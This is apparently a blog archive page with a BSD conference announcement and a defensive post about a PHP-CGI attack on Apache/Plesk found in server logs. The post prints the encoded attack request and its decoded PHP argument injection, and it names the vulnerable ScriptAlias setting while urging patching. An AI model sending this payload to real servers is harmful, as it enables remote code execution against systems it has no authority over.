Archive
vBSDcon 2013 Registrations Now Open!
vBSDcon Registrations Now Open!
In April 2013, Verisign announced vBSDcon 2013 to be held October 25 – 27, 2013 in Dulles, VA. The conference, formatted to resemble an unConference concept, will feature speakers such as David Chisnall, Luigi Rizzo, Baptiste Daroussin, Henning Brauer, Reyk Floeter, and others. vBSDcon will include events like hacker lounges, doc sprints, BSDA exams, and a mid-conference social*.
In these most recent months, they have been developing the vBSDcon conference website hosted at http://www.vbsdcon.com/. It includes full details surrounding the schedule, agenda, and speakers for vBSDcon. The most recent addition to the conference website is that registrations are now open!
* Schedule is subject to change without notice, The BSDA exams are hosted by the BSD Certification group and not an official part of vBSDcon.
Apache/Plesk php Exploit
While reviewing web server logs recently, I spotted the following attack…
216.237.113.27 – – [07/Aug/2013:08:12:14 -0400] “POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1”
404 209 “-” “-”
Which decodes to:
/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions=”” -d
open_basedir=none -d auto_prepend_file=php://input -n
One aspect of a vulnerable deployment includes an Apache configuration utilizing the following ScriptAlias configuration:
ScriptAlias /phppath/ “/usr/bin/”
For those running Plesk or others with the above configuration, it is recommended that your system be patched accordingly. Check the references below for more detailed information regarding this vulnerability.
References
Disclaimer
This blog is posted for informational purposes only. Extensive testing is recommended prior to implementing changes discussed here.